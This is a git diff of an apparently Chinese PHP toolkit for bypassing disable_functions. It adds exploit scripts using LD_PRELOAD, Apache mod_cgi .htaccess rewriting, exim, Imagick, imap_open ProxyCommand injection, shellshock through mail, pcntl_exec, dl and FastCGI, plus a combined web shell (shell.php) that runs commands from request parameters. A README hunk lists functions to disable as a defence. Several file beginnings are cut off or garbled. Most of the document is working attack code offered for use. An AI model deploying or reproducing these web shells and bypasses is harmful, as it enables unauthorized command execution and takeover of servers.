+
+void payload() {
+ system("rm /tmp/check.txt");
+}
+
+int geteuid() {
+if (getenv("LD_PRELOAD") == NULL) { return 0; }
+unsetenv("LD_PRELOAD");
+payload();
+}
+
+/*
+$ gcc -c -fPIC hack.c -o hack
+$ gcc -shared hack -o hack.so
+ */
\ No newline at end of file
diff --git a/exp/apache_mod_cgi/exp.php b/exp/apache_mod_cgi/exp.php
new file mode 100644
index 0000000..69fe0bd
--- /dev/null
+++ b/exp/apache_mod_cgi/exp.php
@@ -0,0 +1,30 @@
+\n";
+}
+if (!isset($_GET['checked'])) {
+ @file_put_contents('.htaccess', "\nSetEnv HTACCESS on", FILE_APPEND); //Append it to a .htaccess file to see whether .htaccess is allowed
+ header('Location: ' . $_SERVER['PHP_SELF'] . '?checked=true'); //execute the script again to see if the htaccess test worked
+} else {
+ $modcgi = in_array('mod_cgi', apache_get_modules()); // mod_cgi enabled?
+ $writable = is_writable('.'); //current dir writable?
+ $htaccess = !empty($_SERVER['HTACCESS']); //htaccess enabled?
+ checkEnabled("Mod-Cgi enabled", $modcgi, "Yes", "No");
+ checkEnabled("Is writable", $writable, "Yes", "No");
+ checkEnabled("htaccess working", $htaccess, "Yes", "No");
+ if (!($modcgi && $writable && $htaccess)) {
+ echo "Error. All of the above must be true for the script to work!"; //abort if not
+ } else {
+ checkEnabled("Backing up .htaccess", copy(".htaccess", ".htaccess.bak"), "Suceeded! Saved in .htaccess.bak", "Failed!"); //make a backup, cause you never know.
+ checkEnabled("Write .htaccess file", file_put_contents('.htaccess', "Options +ExecCGI\nAddHandler cgi-script .dizzle"), "Succeeded!", "Failed!"); //.dizzle is a nice extension
+ checkEnabled("Write shell file", file_put_contents('shell.dizzle', $shellfile), "Succeeded!", "Failed!"); //write the file
+ checkEnabled("Chmod 777", chmod("shell.dizzle", 0777), "Succeeded!", "Failed!"); //rwx
+ echo "Executing the script now. Check your listener 
"; //call the script
+ }
+}
+?>
\ No newline at end of file
diff --git a/exp/dl/exp.php b/exp/dl/exp.php
new file mode 100644
index 0000000..755eac7
--- /dev/null
+++ b/exp/dl/exp.php
@@ -0,0 +1,5 @@
+自写插件,自定义函数,调用system函数
+1.txt");
+?>
\ No newline at end of file
diff --git a/exp/exim/exp.php b/exp/exim/exp.php
new file mode 100644
index 0000000..7dc33f0
--- /dev/null
+++ b/exp/exim/exp.php
@@ -0,0 +1,12 @@
+' . $result_file;
+file_put_contents($tmp_file, $command);
+$payload = "-be \${run{/bin/bash\${substr{10}{1}{\$tod_log}}/tmp/aaaaaaaaaaa.sh}{ok}{error}}";
+mail("a@localhost", "", "", "", $payload);
+echo file_get_contents($result_file);
+@unlink($tmp_file);
+@unlink($result_file);
+?>
\ No newline at end of file
diff --git a/exp/imagick/exp.php b/exp/imagick/exp.php
new file mode 100644
index 0000000..387daca
--- /dev/null
+++ b/exp/imagick/exp.php
@@ -0,0 +1,49 @@
+# Exploit Title: PHP Imagick disable_functions Bypass
+# Date: 2016-05-04
+# Exploit Author: RicterZ (ricter@chaitin.com)
+# Vendor Homepage: https://pecl.php.net/package/imagick
+# Version: Imagick <= 3.3.0 PHP >= 5.4
+# Test on: Ubuntu 12.04
+
+# Exploit:
+
+
+#
+# $ curl "127.0.0.1:8080/exploit.php?cmd=cat%20/etc/passwd"
+#
+# Disable functions: exec,passthru,shell_exec,system,popen
+# Run command: cat /etc/passwd
+# ====================
+# root:x:0:0:root:/root:/usr/local/bin/fish
+# daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+# bin:x:2:2:bin:/bin:/bin/sh
+# sys:x:3:3:sys:/dev:/bin/sh
+# sync:x:4:65534:sync:/bin:/bin/sync
+# games:x:5:60:games:/usr/games:/bin/sh
+# ...
+#
+echo "Disable functions: " . ini_get("disable_functions") . "\n";
+$command = isset($_GET['cmd']) ? $_GET['cmd'] : 'id';
+echo "Run command: $command\n====================\n";
+
+$data_file = tempnam('/tmp', 'img');
+$imagick_file = tempnam('/tmp', 'img');
+
+$exploit = <<$data_file")'
+pop graphic-context
+EOF;
+
+file_put_contents("$imagick_file", $exploit);
+$thumb = new Imagick();
+$thumb->readImage("$imagick_file");
+$thumb->writeImage(tempnam('/tmp', 'img'));
+$thumb->clear();
+$thumb->destroy();
+
+echo file_get_contents($data_file);
+?>
\ No newline at end of file
diff --git a/exp/imap_open/exp.php b/exp/imap_open/exp.php
new file mode 100644
index 0000000..77f3994
--- /dev/null
+++ b/exp/imap_open/exp.php
@@ -0,0 +1,11 @@
+/tmp/test0001
+
+error_reporting(0);
+if (!function_exists('imap_open')) {
+ die("no imap_open function!");
+}
+$server = "x -oProxyCommand=echo\t" . base64_encode($_GET['cmd'] . ">/tmp/cmd_result") . "|base64\t-d|sh}";
+imap_open('{' . $server . ':143/imap}INBOX', '', ''); // or var_dump("\n\nError: ".imap_last_error());
+echo file_get_contents("/tmp/cmd_result");
\ No newline at end of file
diff --git a/exp/mail/exp.php b/exp/mail/exp.php
new file mode 100644
index 0000000..d114e41
--- /dev/null
+++ b/exp/mail/exp.php
@@ -0,0 +1,32 @@
+$tmp 2>&1");
+ // In Safe Mode, the user may only alter environment variableswhose names
+ // begin with the prefixes supplied by this directive.
+ // By default, users will only be able to set environment variablesthat
+ // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty,
+ // PHP will let the user modify ANY environment variable!
+ mail("a@127.0.0.1", "", "", "", "-bv"); // -bv so we don't actuallysend any mail
+ $output = @file_get_contents($tmp);
+ @unlink($tmp);
+ if ($output != "") {
+ return $output;
+ } else {
+ return "No output, or not vuln.";
+ }
+
+}
+echo shellshock($_REQUEST["cmd"]);
+?>
\ No newline at end of file
diff --git a/exp/pcntl_exec/exp.php b/exp/pcntl_exec/exp.php
new file mode 100644
index 0000000..49e734e
--- /dev/null
+++ b/exp/pcntl_exec/exp.php
@@ -0,0 +1,5 @@
+#exec.php
+
+#/tmp/b4dboy.sh
+#!/bin/bash
+ls -l /
\ No newline at end of file
diff --git a/exp/so/php_so.c b/exp/so/php_so.c
new file mode 100644
index 0000000..e69de29
diff --git a/exp/so/system_so.c b/exp/so/system_so.c
new file mode 100644
index 0000000..e69de29
diff --git a/function_check.php b/function_check.php
deleted file mode 100644
index 1c47a21..0000000
--- a/function_check.php
+++ /dev/null
@@ -1,46 +0,0 @@
-
- $func enable",1);
-
- }
- }
-
-
- }else{
-
- msg("disable_functions none !!!",1);
-
- }
-
- function msg($text,$type=0){
-
- $def="[*]";
- $color="green";
- if($type ==1){
-
- $def="[+]" ;
- $color="red";
- }else if ($type==-1){
-
- $def="[-]";
- }
- echo "$def $text
";
-
- }
-
-
-
-
-
-?>
\ No newline at end of file
diff --git a/bypass_function.md b/paper/readme.old.md
similarity index 81%
rename from bypass_function.md
rename to paper/readme.old.md
index e1d674c..64a5ded 100644
--- a/bypass_function.md
+++ b/paper/readme.old.md
@@ -1,6 +1,13 @@
+# Bypass_Disable_functions_Shell
+一个各种方式突破Disable_functions达到命令执行的shell
+### 防御
+dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,mb_send_mail,putenv,ini_set,apache_setenv,symlink,link
### 功能
+##### imap_open bypass
+https://antichat.com/threads/463395/#post-4254681
+
##### 利用环境变量LD_PRELOAD来绕过
http://drops.wooyun.org/tips/16054
@@ -66,13 +73,5 @@ http://0cx.cc/bypass_disabled_via_mod_cgi.jspx
##### mail的exim扩展bypass
http://www.cnblogs.com/iamstudy/articles/Exim_mail_bypass_disable_function.html
-### 防御
-dl
-exec
-system
-passthru
-popen
-proc_open
-pcntl_exec
-shell_exec
-mail
+
+
diff --git a/shell.php b/shell.php
new file mode 100644
index 0000000..6035db3
--- /dev/null
+++ b/shell.php
@@ -0,0 +1,528 @@
+ array("exec", "shell_exec", "system", "passthru", "popen", "proc_open"),
+// "load_so" => array("dl"),
+// "ld_preload_so" => array("mail", "error_log", "imap_mail", "mb_send_mail"),
+// "shellshock" => array("mail"),
+// "apache_mod_cgi" => array(),
+// "imagick" => array(),
+// "pwn" => array(),
+//);
+
+echo "Temp Dir:" . WRITE_DIR . "
";
+echo "Arch: " . ARCH . "; OS: " . OS . "
";
+
+foreach ($vul_function_arr as $func) {
+ if (function_exists($func)){
+ echo "Exist: ".$func."
";
+ } else {
+ echo "no exist: ".$func."
";
+ }
+}
+
+function read_file($filename){
+ if(function_exists('file_get_contents')){
+ return file_get_contents($filename);
+ } elseif (function_exists('fopen') && function_exists('fread')){
+ $handle = fopen($filename, 'r');
+ $content = '';
+ while(!feof($handle)){
+ $content .= fread($handle, 1000);
+ }
+ fclose($handle);
+ return $content;
+ } else {
+ echo "no read function";
+ return;
+ }
+}
+
+function write_file($filename, $content, $model="w"){
+ if (function_exists('file_put_contents')) {
+ file_put_contents($filename, $content);
+ } else {
+ echo "no write function";
+ return;
+ }
+}
+
+function random_str($len = 8) {
+ $s = '';
+ for ($i = 0; $i < $len; $i++) {
+ $s .= chr(mt_rand(33, 126));
+ }
+ return $s;
+}
+
+function is_x64() {
+ $int = "9223372036854775807";
+ $int = intval($int);
+ if ($int == 9223372036854775807) {
+ return true;
+ }
+ elseif ($int == 2147483647) {
+ return false;
+ }
+ else {
+ return "error";
+ }
+}
+
+function trans_cmd($cmd, $outfile){
+ if (OS == 'Windows'){
+ $cmd = $cmd . " > " . $outfile;
+ }else{
+ $cmd = $cmd . " > " . $outfile . " 2>&1";
+ }
+ return $cmd;
+}
+
+function send_cmd_to_file($cmd, $file = 'cmd', $result = 'result') {
+ $outfile = WRITE_DIR . $result;
+ $cmdfile = WRITE_DIR . $file;
+
+ $cmd = trans_cmd($cmd, $outfile);
+
+ write_file($cmdfile, $cmd);
+ return array(
+ $cmdfile,
+ $outfile
+ );
+}
+
+function send_cmd($cmd, $result = 'result') {
+ $outfile = WRITE_DIR . $result;
+
+ $cmd = trans_cmd($cmd, $outfile);
+
+ return array(
+ $cmd,
+ $outfile
+ );
+}
+
+function recv_result($result = 'result') {
+ $ret = read_file($result);
+ @unlink($result);
+ return $ret;
+}
+
+function send_socket($data, $host, $port=9000) {
+ if ( function_exists('stream_socket_client') ) {
+ if (strpos($host,'unix://') !== false) {
+ $client = $host;
+ } else {
+ $client = 'tcp://' . $host . ':' . $port;
+ }
+
+ $fp = stream_socket_client($client);
+ } elseif (function_exists('fsockopen')) {
+ $fp = fsockopen($host, $port, $errno, $errstr, 30);
+ } else {
+ return FAILURE;
+ }
+
+ if ($fp) {
+ $content = "";
+ fwrite($fp, $data);
+ while (!feof($fp)) {
+ $content .= fgets($fp, 4096);
+ }
+ fclose($fp);
+ return $content;
+ } else {
+ return FAILURE;
+ }
+}
+
+/*
+ * 第一种: 常规绕过, 寻找漏掉的命令执行函数, 适用于winodws + linux
+ * exec、shell_exec、system、passthru、popen、proc_open
+ */
+
+function common_exec_cmd($cmd) {
+ $res = '';
+ if (function_exists('exec')) {
+ @exec($cmd, $res);
+ $res = join("\n", $res);
+ } elseif (function_exists('shell_exec')) {
+ $res = @shell_exec($cmd);
+ } elseif (function_exists('system')) {
+ @ob_start();
+ @system($cmd);
+ $res = @ob_get_contents();
+ @ob_end_clean();
+ } elseif (function_exists('passthru')) {
+ @ob_start();
+ @passthru($cmd);
+ $res = @ob_get_contents();
+ @ob_end_clean();
+ } elseif (@is_resource($f = @popen($cmd, "r"))) {
+ $res = '';
+ while (!@feof($f)) {$res .= @fread($f, 1024);}
+ @pclose($f);
+ } elseif (function_exists('proc_open')) {
+ $descriptorspec = array(
+ 0 => array("pipe", "r"),
+ 1 => array("pipe", "w"),
+ 2 => array("pipe", "w")
+ );
+ $process = proc_open($cmd, $descriptorspec, $pipes, null, null);
+ if (is_resource($process)) {
+ fwrite($pipes[0], '$stdin');
+ fclose($pipes[0]);
+ $res = stream_get_contents($pipes[1]);
+ }else{
+ return FAILURE;
+ }
+ } else {
+ return FAILURE;
+ }
+ return $res;
+}
+
+/*
+ * 第二种: pcntl_exec绕过
+ */
+
+function pcntl_exec_cmd($cmd) {
+ if (function_exists('pcntl_exec')) {
+ $cmd_arr = send_cmd_to_file($cmd, 'cmd.sh');
+ pcntl_exec("/bin/bash", array($cmd_arr[0]));
+ return recv_result($cmd_arr[1]);
+ } else {
+ return FAILURE;
+ }
+}
+
+//echo pcntl_exec_cmd("id");
+
+/*
+ * 第三种: ld_preload绕过: 仅限Linux
+ * mail、imap_mail、error_log、mb_send_mail
+ * From: https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD/
+ */
+
+function ld_preload_exec_cmd($cmd) {
+ $so_file = WRITE_DIR . 'system.so';
+
+ if (ARCH === 64) {
+ write_file($so_file, hex2bin($GLOBALS['system_so_x64']));
+ } else {
+ write_file($so_file, hex2bin($GLOBALS['system_so_x32']));
+ }
+
+ $cmd_arr = send_cmd($cmd, 'result');
+ putenv("EVIL_CMDLINE=" . $cmd_arr[0]);
+ putenv("LD_PRELOAD=" . $so_file);
+
+ if (function_exists('error_log')){
+ error_log("", 1, "example@example.com");
+ } elseif (function_exists('mail')){
+ mail("", "", "", "");
+ } elseif (function_exists('mb_send_mail')){
+ mb_send_mail("","","");
+ } elseif ((function_exists('imap_mail'))){
+ imap_mail("","","");
+ } else {
+ @unlink($so_file);
+ return FAILURE;
+ }
+
+ // del so file
+ @unlink($so_file);
+ return recv_result($cmd_arr[1]);
+}
+
+//echo ld_preload_exec_cmd($_GET['cmd']);
+
+//$so_file = WRITE_DIR . 'system_x32.so';
+//var_dump(bin2hex(read_file($so_file)));
+
+/*
+ * 第四种: ld加载php扩展:
+ * ld
+ * https://github.com/Medicean/as_bypass_php_disable_functions
+ * https://github.com/AntSwordProject/ant_php_extension
+ */
+
+function dl_exec($cmd){
+ if(function_exists('dl')){
+ $so_file = WRITE_DIR . 'php.so';
+
+ if (ARCH === 64) {
+ write_file($so_file, hex2bin($GLOBALS['php_so_x64']));
+ } else {
+ write_file($so_file, hex2bin($GLOBALS['php_so_x32']));
+ }
+
+ $so_file = "ant_x64.so";
+ dl($so_file);
+ $result = antsystem($cmd);
+
+ // del so file
+ @unlink($so_file);
+ return $result;
+ }else{
+ return FAILURE;
+ }
+}
+
+//echo dl_exec("id");
+
+/*
+ * 第五种: imap_open: 仅限Linux
+ */
+
+function imap_open_exec($cmd){
+ if (function_exists('imap_open')) {
+ $cmd_arr = send_cmd($cmd);
+ $server = "x -oProxyCommand=echo\t" . base64_encode($cmd_arr[0]) . "|base64\t-d|sh}";
+ imap_open('{' . $server . ':143/imap}INBOX', '', '');
+ return recv_result($cmd_arr[1]);
+ }else{
+ return FAILURE;
+ }
+}
+
+//echo imap_open_exec("id");
+
+/*
+ * exim
+ */
+
+//function exim_exec($cmd){
+// if (function_exists('mail')) {
+// $cmd_arr = send_cmd_to_file($cmd);
+// $payload = "-be \${run{/bin/bash\${substr{10}{1}{\$tod_log}}".$cmd_arr[0]."}{ok}{error}}";
+// mail("a@localhost", "", "", "", $payload);
+// return recv_result($cmd_arr[1]);
+// }else{
+// return FAILURE;
+// }
+//}
+
+/*
+ * Imagick类, 选择更加通用的绕过方式吧
+ */
+
+//function imagick_exec($cmd){
+// if(class_exists('Imagick')){
+// $imagick_file = WRITE_DIR . 'img';
+//
+// $cmd_arr = send_cmd($cmd);
+//
+// $exploit = <<readImage("$imagick_file");
+// $thumb->writeImage(WRITE_DIR . 'tmp');
+// $thumb->clear();
+// $thumb->destroy();
+//
+// return recv_result($cmd_arr[1]);
+// }else{
+// return 'nonono';
+// }
+//}
+
+
+/*
+ * FastCgi:
+ * 9000 port
+ * phpx.x-fpm.sock
+ *
+ * Fail: windows
+ */
+
+function p($ptr){
+ return bin2hex(chr($ptr));
+}
+
+function pnv($len){
+ if($len < 128){
+ return p($len);
+ }else{
+ return p(($len >> 24) |0x80) . p(($len >> 16) & 0xFF) . p(($len >> 8) & 0xFF) . p($len & 0xFF);
+ }
+}
+
+// 还需要更改具体的fastcgi参数, 目前能在linux下使用
+//$host = 'unix:///run/php/php7.3-fpm.sock';
+function fastcgi_exec($cmd, $file, $host, $port=9000){
+ if (strlen($cmd) > 40) {
+ echo "Bug: command len need < 40, will be fix.";
+ }
+
+ $cmd = base64_encode($cmd);
+ $php_code = '';
+
+ $php_code_len = strlen($php_code);
+ $php_code_pad = p(($php_code_len >> 8) & 0xFF) . p($php_code_len & 0xFF) . p(0) . p(0);
+
+ //$uri = bin2hex(__FILE__);
+ //$uri = '/var/www/html/shell.php';
+ $uri = $file;
+ $uri_val_pad = pnv(strlen($uri));
+
+ $params = '0e02434f4e54454e545f4c454e475448'.bin2hex($php_code_len).'0c10434f4e54454e545f545950456170706c69636174696f6e2f746578740b0452454d4f54455f504f5254393938350b095345525645525f4e414d456c6f63616c686f7374110b474154455741595f494e54455246414345466173744347492f312e300f0e5345525645525f534f4654574152457068702f66636769636c69656e740b0952454d4f54455f414444523132372e302e302e310f'.$uri_val_pad.'5343524950545f46494c454e414d45'.bin2hex($uri).'0b'.$uri_val_pad.'5343524950545f4e414d45'.bin2hex($uri).'091f5048505f56414c55456175746f5f70726570656e645f66696c65203d207068703a2f2f696e7075740e04524551554553545f4d4554484f44504f53540b025345525645525f504f525438300f085345525645525f50524f544f434f4c485454502f312e310c0051554552595f535452494e470f165048505f41444d494e5f56414c5545616c6c6f775f75726c5f696e636c756465203d204f6e0d01444f43554d454e545f524f4f542f0b095345525645525f414444523132372e302e302e310b'.$uri_val_pad.'524551554553545f555249'.bin2hex($uri);
+ $params_len = strlen(hex2bin($params));
+ $params_pad = p(($params_len >> 8) & 0xFF) . p($params_len & 0xFF) . p(0) . p(0);
+
+ $fastcgi_data = '01017b0700080000000100000000000001047b07'.$params_pad.$params.'01047b070000000001057b07'.$php_code_pad.bin2hex($php_code).'01057b0700000000';
+
+ $result = send_socket(hex2bin($fastcgi_data), $host, $port);
+// if($result != FAILURE){
+// $start = md5("s");;
+// $end = md5("e");;
+// $input = $result;
+// $result = substr($input, strlen($start)+strpos($input, $start),(strlen($input) - strpos($input, $end))*(-1));
+// }
+ return $result;
+}
+
+//var_dump(fastcgi_exec("id",'/var/www/html/shell.php' , '127.0.0.1', 9002));
+//echo fastcgi_exec("id",'/var/www/html/ant.php' , 'unix:///run/php/php7.3-fpm.sock');
+//var_dump(fastcgi_exec("whoami",'C:\\phpstudy2018\\PHPTutorial\\WWW\test\\apache\\1.php' , '127.0.0.1', 9000));
+
+/*
+ * COM执行: 仅限windows
+ * work on:
+ * php 5.4.45
+ *
+ * *******
+ * fail:
+ * > php 5.5.38
+ *
+ */
+
+function com_exec($cmd){
+ $cmd = "cmd.exe /c ".$cmd;
+ $cmd_arr = send_cmd($cmd);
+
+ echo "执行时候会黑框, 需要时间; 如果有延时命令执行的时候特别需要注意一下。";
+
+ $wscript = new COM('wscript.shell');
+ $wscript->Run($cmd_arr[0]);
+
+ sleep(1);
+ return recv_result($cmd_arr[1]);
+}
+
+//echo com_exec($_GET['cmd']);
+
+/*
+ * Apache mod-cgi: Windows && Linux
+ * 需要保证一个web目录可写可访问
+ *
+ * 注意备份htaccess
+ */
+
+function apache_cgi_exec($cmd, $dir='.'){
+ echo "由于是系统调用cmd执行后命令,会有一些延迟。请新建目录执行, 以免htaccess出问题导致本身shell不可访问。";
+ // check
+// if(!in_array('mod_cgi', apache_get_modules()) && !empty($_SERVER['HTACCESS']) && is_writable($dir)){
+// return FAILURE;
+// }
+
+ $cmd_arr = send_cmd($cmd);
+ if(OS == "Windows") {
+ $shell_file = "bye.bat";
+ $htaccess = "ScriptInterpreterSource Registry-Strict\nAddHandler cgi-script .bat\nOptions +ExecCGI +FollowSymlinks";
+
+ $cmd_arr[0] = escapeshellcmd($cmd_arr[0]);
+ $content = "@echo off\necho Content-Type: text/html\nfor /F %%i in ('$cmd_arr[0]') do ( set result=%%i)";
+ } else {
+ $shell_file = "1.bylinux";
+ $htaccess = "Options +ExecCGI\nAddHandler cgi-script .bylinux";
+ $content = "#!/bin/bash\necho \"Content-Type: text/html\\n\\n\"\n" . $cmd_arr[0];
+ }
+
+ write_file('.htaccess', $htaccess);
+ write_file($shell_file, $content);
+
+ echo "
";
+ sleep(1);
+ echo recv_result($cmd_arr[1]);
+}
+
+//echo apache_cgi_exec($_GET['cmd']);
+
+
+echo <<
+$disable_function_str
+
+Vulable Function:
+$vul_function_str
+
+Open Basedir:
+$open_basedir
+
+
+
+EOF;
+
+//echo $_POST["cmd"];
+
+
+?>
+